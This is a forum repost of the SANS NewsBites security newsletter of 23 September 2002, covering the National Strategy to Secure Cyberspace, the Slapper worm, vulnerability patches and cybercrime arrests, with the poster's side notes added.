Brought to you by our friends at the SANS Institute.


Things of interest in this issue:
  • ARTICLES ON THE NATIONAL STRATEGY FOR SECURING CYBERSPACE (NSSC)
  • Suspected Slapper Author Arrested; New Variant on the Loose
  • Continuing Cisco VPN 5000 Vulnerabilities
  • XP Service Pack Causes Problems
  • Patches Available for Microsoft Java VM Vulnerabilities *I know alot of people have been complaining about this*
  • Norton Found In Contempt of Court for Failing to Address Computer Security Issues
  • Article demonstrating the changes in information warfare.



What are your thoughts on this weeks news?




***********************************************************************
SANS NewsBites September 23, 2002 Vol. 4, Num. 39
***********************************************************************

ARTICLES ON THE NATIONAL STRATEGY FOR SECURING CYBERSPACE (NSSC)
18 September 2002 NSSC Avoids Regulations; Critics Say it Lacks
Necessary Muscle
16 & 19 September 2002 NSSC Summary
17-19 September 2002 Variety of Experts Chat With Washington Post
About the NSSC
17 September 2002 Home Users Know the Drill but Don't Abide By It

A TIME LINE
18 September 2002 Cyber Security Time Line
xmaddness's side note:
We are actually holding discussions here at AntiOnline about what we, the security/Computer Admins, would like to see added to this this bill. If you would like to be involved send me a Private Message.

THE REST OF THE WEEK'S NEWS
23 September 2002 Suspected Slapper Author Arrested; New Variant on
the Loose

16 & 17 September 2002 Slapper Worm
23 September 2002 al Qaeda May Have Structural Analysis Software
22 September 2002 Scottish Pol's E-Mail Spoofed
21 September 2002 Client Employee Arrested for Data Theft
20 September 2002 Cisco VPN 5000 Vulnerabilities
20 September 2002 VeriSign Won't Disclose .gov Info
20 September 2002 Oregon Cyber Security Awareness Program for Youth
20 September 2002 XP Service Pack Causes Problems
19 & 20 September 2002 Suspected T0rn Rootkit Author Arrested
19 September 2002 Disgruntled Former Employee Gets Prison Sentence
for Erasing Company Data
19 September 2002 Nokia Decries Warchalking
18 & 19 September 2002 Patches Available for Microsoft Java VM
Vulnerabilities

18 & 19 September 2002 Falun Gong Members on Trial for TV Hacking
18 September 2002 Gartner Advises Waiting to Deploy Yukon
18 September 2002 Bush Appoints 24 to NIAC
17 & 18 September 2002 Norton Found In Contempt of Court for Failing
to Address Computer Security Issues

17 September 2002 Glue: The Latest in Anti-Piracy Technology
17 September 2002 Paul Kocher Interviewed on Cryptography
16 September 2002 Senate Homeland Security Bill Would Broaden
Indemnity
16 September 2002 Analysis Finds More Government Sites Have Security
and Privacy Policies
16 September 2002 Informal Airport LAN Audit Reveals Lax Security
16 September 2002 Sites Still Vulnerable to Cross-Site Scripting
15 & 16 September 2002 Mozilla Browser Privacy Hole

ARTICLES ILLUSTRATING CHANGES IN INFORMATION WARFARE
16 September 2002 ABCNews Hired Firm to Test CA Police Dept. Security
From Afar
16 September 2002 Nimda Changed IT Security Thinking

FREE WEB BROADCAST: October 2, 1:00 PM EDT (1700 UTC).
Dustin Childs covers the basics of event logs in Windows NT and 2000,
the managing of logs, and when you can and cannot completely trust
those logs. Listen live and ask questions, or, once you have an access
code, sign on later to listen to the web cast at your leisure.
Register in advance to get the handouts:
http://sans.digisle.tv/audiocast_100202/brief.htm

SECURITY TRAINING NEWS
*SANS Network Security 2002 in October: Largest security conference &
expo: http://www.sans.org/NS2002
*SANS Cyber Defense Initiative in San Francisco - Dec. 15-20
Featuring 8 hands-on SANS immersion training tracks. San Francisco
is usually warmer in December than in August.
*Advanced security training in fifty additional cities, plus Local
Mentor programs in 35 cities. See: http://www.sans.org


ARTICLES ON THE NATIONAL STRATEGY FOR SECURING CYBERSPACE

--18 September 2002 NSSC Avoids Regulations; Critics Say it Lacks
Necessary Muscle

The National Strategy to Secure Cyberspace encourages home users to
adopt safe computing practices but shies away from creating federal
regulations to attain cyber security. Critics say the strategy has no
teeth, that all ideas that might have proven objectionable to anyone
have been removed.
http://online.securityfocus.com/news/677
http://www.washingtonpost.com/wp-dyn...2002Sep18.html
NSSC text: http://www.whitehouse.gov/pcipb/cyberstrategy-draft.pdf

--16 & 19 September 2002 NSSC Summary
The National Strategy to Secure Cyberspace draft recommendations by
sector: consumer and small business, large companies, governments
and universities and international partners. The draft also lists 18
national cyber security priorities.
http://www.washingtonpost.com/wp-dyn...2002Sep19.html
http://www.fcw.com/fcw/articles/2002...t-09-16-02.asp

--17-19 September 2002 Variety of Experts Chat With Washington Post
About the NSSC

Online transcripts of chats with various people about NSSC
Alan Paller (SANS):
http://www.washingtonpost.com/wp-srv...ller091802.htm
Scott Charney (Microsoft):
http://www.washingtonpost.com/wp-srv...rney091702.htm
Richard Smith:
http://www.washingtonpost.com/wp-srv...mith091902.htm
[Editors' Comment on the Strategy:
(Ranum) It's not a strategy; it's a statement of the obvious. It
would have been more effective if The President simply asked the
hackers to be nice and cease and desist.
(Murray): Did anyone find any mention of cryptography? I found
no mention of strong authentication (except for home users; weak
passwords on their systems are not being attacked). I found no mention
of closed networks. Anyone find any mention of holding edge connectors
responsible for their traffic or for enforcing source IP addresses? The
report's solution to the broken transport layer is to avoid the use
of wireless. Its solution to the problem of weak systems connected
to the Internet is more "patch and fix." Did anyone find mention of
safe defaults? Are all these things too controversial even to float?]

xmaddness's side notes:
We have been reading through this, and one thing I noticed was that they use the term "Hacker", to describe a malicious cracker. That right there tells me they did not spend enough time with the actual security/hackers to know what to really look for. We need to stop letting the big dogs write bills that will do nothing. Again, PM me if you would like to contribute.


--17 September 2002 Home Users Know the Drill but Don't Abide By It
The recently released draft of the National Strategy to Secure
Cyberspace recommends that home users deploy firewalls, use
regularly updated anti-virus software, create strong passwords,
install all necessary patches and use common sense about e-mail and
downloads. Though these pieces of advice are well-known, many home
users do not adhere to them.
http://www.washingtonpost.com/wp-dyn...2002Sep17.html

A TIME LINE

--18 September 2002 Cyber Security Time Line
This page offers a brief time-line of computer bugs, viruses, worms
and attacks from the 1945 moth in Navy computer relays to the Morris
worm to Melissa author David Smith's sentencing. Also includes cyber
milestones such as the development of ASCII, the launch of ARPANET
and the appointment of the nation's first "cyber security czar."
http://www.washingtonpost.com/wp-dyn...2002Jun26.html
[Editor's Note (Northcutt): I enjoyed the retelling of the cyber
security story. It appears the rate of change in security is
accelerating.]


THE REST OF THE WEEK'S NEWS

--23 September 2002 Suspected Slapper Author Arrested; New Variant
on the Loose

A man has been arrested on suspicion of authoring the Slapper worm;
the worm evidently was sending infected machine addresses back to
his Ukraine-based e-mail address. Though the original Slapper worm
activity appears to be calming down, a variant has been detected in
the wild and has been spreading in Australia.
http://www.vnunet.com/News/1135274
http://www.news.com.au/common/story_page/0,4057,5151968^15306,00.html

--16 & 17 September 2002 Slapper Worm
The Linux.Slapper.Worm, which exploits a vulnerability in the OpenSSL
protocol of Linux Apache web server, is believed to be the first worm
that makes use of P2P technology. The worm has infected at least
30,000 servers. The worm directs infected machines to join a P2P
network, and the network could be used to launch a denial of service
attack. It spreads through port 80. There is a fix for the security
hole it exploits. OpenSSL versions 0.9.6e and newer are fixed.
http://www.computerworld.com/securit...,74288,00.html
http://www.wired.com/news/technology...,55172,00.html
http://news.com.com/2100-1001-958122.html
http://www.theregister.co.uk/content/55/27134.html
http://www.msnbc.com/news/808678.asp?0dm=C224T
http://www.vibrantmedia.com/computer...ticleID=235074
http://www.computerworld.com/securit...,74325,00.html
CERT/CC Advisory: http://www.cert.org/advisories/CA-2002-27.html

--23 September 2002 al Qaeda May Have Structural Analysis Software
According to an FBI bulletin, a computer belonging to a bin Laden
associate contained software that can be used to find structural
weaknesses in large structures like dams and skyscrapers.
http://news.com.au/common/story_page/0,4057,5149311^421,00.html

--22 September 2002 Scottish Pol's E-Mail Spoofed
A hacker spoofed the e-mail account of Scottish Member of Parliament
(SMP) Fiona Hylsop and used it to send spam. Detectives have been
called in.
http://www.scotlandonsunday.com/poli...?id=1053342002

--21 September 2002 Client Employee Arrested for Data Theft
A Chinese oil company employee who was receiving training to use
advanced seismic imaging software from 3DGeo Development was arrested
after it was alleged that he had accessed 3DGeo proprietary code and
copied it onto his laptop. If convicted, Shan Yan Ming could face
five years in prison and a $250,000 fine.
http://www.bayarea.com/mld/mercuryne...ss/4121880.htm

--20 September 2002 Cisco VPN 5000 Vulnerabilities
Security holes in Cisco VPN 5000 Client software could allow an
attacker to attain root access to local workstations running the
software or to grab passwords. The root access hole affects the 5.2.7
for Linux and 5.2.8 for Solaris versions of the software, while the
password vulnerability is present in the version for Macintosh in
all versions prior to 5.2.2. Cisco has placed updates on its website.
http://www.idg.net/ic_950944_5055_1-2793.html

--20 September 2002 VeriSign Won't Disclose .gov Info
VeriSign Inc. will no longer supply the public with data about the
.gov Internet domain because the company fears the information could
be used to plot cyber attacks.
http://www.theregister.co.uk/content/55/27210.html

--20 September 2002 Oregon Cyber Security Awareness Program for Youth
The Hillsboro, Oregon police department plans to launch a cybersecurity
awareness program aimed at young people. The Cyber Awareness,
Responsibility and Ethics program will begin at the Boys and Girls
Clubs of Hillsboro and eventually spread to the schools. The program
hopes to educate area youth about the effect their actions can have;
it will also encourage constructive cyber experimentation under the
guidance of other young people.
http://www.oregonlive.com/metrowest/...3123238162.xml
[Editor's Note ]Schultz): Ultimately, strategic gains in the
information security arena will be due to efforts like the one
described in this news item. The next generation merits our full
attention when it comes to security education and awareness.]

--20 September 2002 XP Service Pack Causes Problems
A small group of Windows XP customers has reported having problems
with the operating system's first service pack which was released on
September 9th. Among the problems cited are slow-running machines,
unstable systems and crashing programs.
http://www.pcworld.com/news/article/0,aid,105144,00.asp
[Editor's Note (Murray): Toshiba advised me to re-install XP from
scratch to get rid of the service pack.]

--19 & 20 September 2002 Suspected T0rn Rootkit Author Arrested
A 21-year-old UK man has been arrested on suspicion of writing the
T0rn rootkit, which helps people attack Linux based servers and was
used by the Lion worm. Officers from Scotland Yard's Computer Crime
Unit arrested the man, whose name has not been released, under the
country's 1990 Computer Misuse Act. He is presently out on bail
http://www.theregister.co.uk/content/55/27200.html
http://news.bbc.co.uk/2/hi/technology/2270962.stm
http://www.usatoday.com/tech/news/20...d-hacker_x.htm

--19 September 2002 Disgruntled Former Employee Gets Prison Sentence
for Erasing Company Data
A UK computer engineer who botched a job went back into the company's
computer system and wiped out their data after the company refused to
pay his bill; Stephen Carey had altered the company's computer system
so he could access the database from home. Police who seized the man's
home computer found that the time the files were destroyed matched
the time his home computer was connected to the company's. Carey
received an 18-month prison sentence for unauthorized modification
of computer material.
http://www.ds-osac.org/edb/cyber/new...y.cfm?KEY=9061

--19 September 2002 Nokia Decries Warchalking
Nokia has issued an advisory condemning warchalking, the practice of
marking the locations of wireless access points outside buildings. The
company maintains that people who use bandwidth without paying for
it are thieves. A number of readers' comments are posted along with
the article.
http://news.bbc.co.uk/2/hi/technology/2268224.stm

--18 & 19 September 2002 Patches Available for Microsoft Java VM
Vulnerabilities

Microsoft issued a security bulletin urging Windows users to apply
two patches for vulnerabilities in the company's Java Virtual
Machine. The flaws affect all versions of VM, including the most
recent (5.0.3805). The flaws could be exploited to gain control of
vulnerable machines by sending users specially crafted HTML e-mail
or enticing them to visit specially constructed web sites.
http://news.com.com/2100-1001-958547.html
http://www.computerworld.com/securit...,74365,00.html
http://www.microsoft.com/technet/sec...n/MS02-052.asp

--18 & 19 September 2002 Falun Gong Members on Trial for TV Hacking
Fifteen members of the Falun Gong spiritual movement in China
have gone on trial for hacking into a cable television network and
broadcasting pro-Falun Gong footage. If found guilty, each member
could face between three and seven years in prison.
http://news.bbc.co.uk/1/hi/world/asi...ic/2267523.stm
http://asia.cnn.com/2002/WORLD/asiap...ong/index.html

--18 September 2002 Gartner Advises Waiting to Deploy Yukon
Analysts are warning users not to deploy the upcoming version of
Microsoft SQL server, known as Yukon, because it is likely to contain
numerous security holes. Gartner is advising users to wait for the
release of Service Pack 1.
http://www.vnunet.com/News/1135116
[Editor's Note (Schultz): The competence of this advice from the
Gartner Group is extremely dubious. It appears to be a massive
overgeneralization that does not take this specific product into
account. Did the Gartner Group even ask Microsoft how this product
fared with security testing? What about Windows XP? It would be
difficult to claim that it was full of security holes (although
some [(Paller) *many*] were discovered) and should thus not be used
until SP1 was available. Also, the statement to the effect that if an
organization uses Yukon, it should minimize the services that are run,
adds absolutely nothing. You should always run only essential services,
regardless of whether the product is a Microsoft product.]

--18 September 2002 Bush Appoints 24 to NIAC
President Bush has appointed 24 people to the National Infrastructure
Advisory Committee (NIAC). The committee makes recommendations about
national security and economic critical infrastructure cyber security;
it also addresses cyber security partnerships between the public and
private sectors. The council members are drawn from major economic
sectors, like energy, transportation and banking, and from law
enforcement, academia and state and local government.
http://www.whitehouse.gov/news/relea...020918-12.html

--17 & 18 September 2002 Norton Found In Contempt of Court for
Failing to Address Computer Security Issues

Interior Secretary Gale Norton and Assistant Secretary for Indian
affairs Neal McCaleb have been found in contempt of court for failing
to adequately address vulnerable computer systems that manage Indian
trust fund accounts. The entire Interior department was taken off
line late last year when it became clear that its computer systems
lacked adequate security.
http://www.fcw.com/fcw/articles/2002...t-09-17-02.asp
http://www.gcn.com/vol1_no1/daily-updates/20053-1.html
xmaddness's side note
This is one of the things that we are also discussing in our bill, a .gov to force companies to patch theirs holes.



--17 September 2002 Glue: The Latest in Anti-Piracy Technology
In yet another attempt to thwart music pirates, one record company is
giving reviewers CDs sealed into players with headphone jacks sealed
so the CD cannot be re-recorded. At least one reviewer was able to
retrieve the CD, however.
http://www.iht.com/articles/70893.html
http://www.vnunet.com/News/1135077

--17 September 2002 Paul Kocher Interviewed on Cryptography
In an interview, cryptographer Paul Kocher discusses how the increasing
complexity of cryptography affects computer security.
http://www.businessweek.com/technolo...20917_5283.htm

--16 September 2002 Senate Homeland Security Bill Would Broaden
Indemnity
An amendment to the Senate's version of the Homeland Security Bill
would have the government pay liability damages beyond the private
coverage held by designated homeland security vendors. Critics are
concerned that the extension of this indemnity would have a negative
impact of the quality of security products.
http://www.computerworld.com/governm...,74279,00.html

--16 September 2002 Analysis Finds More Government Sites Have
Security and Privacy Policies
Brown University's Center for Public Policy analyzed 1,265 federal
and state government web sites; among their findings were marked
increases in the number of sites with security and privacy policies
when compared with the sites last year. The study also noted that
some sites restrict access to certain information.
http://www.gcn.com/vol1_no1/daily-updates/20026-1.html

--16 September 2002 Informal Airport LAN Audit Reveals Lax Security
A recent audit of wireless LANs at airports in Chicago, San Francisco,
San Diego and Atlanta revealed that many were not running even basic
security measures; only about 25% of the access points had the WEP
protocol turned on. Some access points were found to be broadcasting
DCHP. The audit was informal, conducted as an executive at a security
research firm traveled through various airports over the course of
a week.
http://www.computerworld.com/mobilet...,74271,00.html

--16 September 2002 Sites Still Vulnerable to Cross-Site Scripting
A significant number of web sites are vulnerable to cross-site
scripting attacks, despite warnings about the problem that have been
out for six months. Crackers have exploited the vulnerabilities to
publish phony press releases and to steal credit card information
and cookies. Addressing the problem on each site can be complicated
and time consuming. It is also possible that because the affected
site is the party delivering the malicious code, it could be liable
for damages.
http://www.vnunet.com/News/1135064

--15 & 16 September 2002 Mozilla Browser Privacy Hole
A privacy flaw in the Mozilla browser discloses the URL of the site
a user is visiting to the web server of the last site visited. This
holds true even if the next site visited is typed in manually or a
bookmarked site. The flaw affects at least versions 1.0, 1.0.1 and
1.1 of Mozilla, as well as Netscape 7 and Galeon.
http://news.com.com/2100-1001-958001.html
http://www.computerworld.com/securit...,74297,00.html

ARTICLES ILLUSTRATING CHANGES IN INFORMATION WARFARE
(Northcutt) The next two articles help us understand the future of
information warfare. Malicious code is essentially asymmetric. It is
a lot cheaper to write a worm than to clean up after one has infected
your systems. A determined adversary with a substantial technology
base could create a variety of attacks that have never been seen
before and release them at the same time. As long as they do not
gain entry into specialized command and control networks that are
supposedly not connected to the Internet, the result is more likely
to be a nuisance than a nightmare. As Ed Skoudis put it, "I'm looking
forward to an Internet 'snow day', I could use the rest".

--16 September 2002 ABCNews Hired Firm to Test CA Police
Dept. Security From Afar
In a "swarming attack," terrorists would attack both physically and
on the cyber space front; the forthcoming National Strategy to Secure
Cyberspace is designed to address such concerns. In an effort to
discover what kind of havoc hackers could wreak from afar, ABCNews
hired a Colorado Springs-based computer security consulting firm
to break into a California police department's computer system. The
hackers mapped the department's network, sent a phony e-mail from the
chief to a detective, and tried to send the chief a Trojan horse,
which was blocked by the department's virus detection system. They
also sent fake warnings to every screen in the department before they
disclosed their identity. The police department officials were aware
that the attack was going to take place; they just didn't know when.
http://abcnews.go.com/sections/wnt/D...ror020913.html

--16 September 2002 Nimda Changed IT Security Thinking
The spread of the Nimda worm had a greater effect on cyber security
than did the September 11th terrorist attacks. The worm, which
debuted a year ago, spread not only through e-mail attachments,
but also through shared files on servers. It broadened the focus
of security to encompass not only network and perimeter security,
but application and database security as well. It also drove home
the point that patches and updates need to be applied quickly.
http://www.computerworld.com/securit...,74284,00.html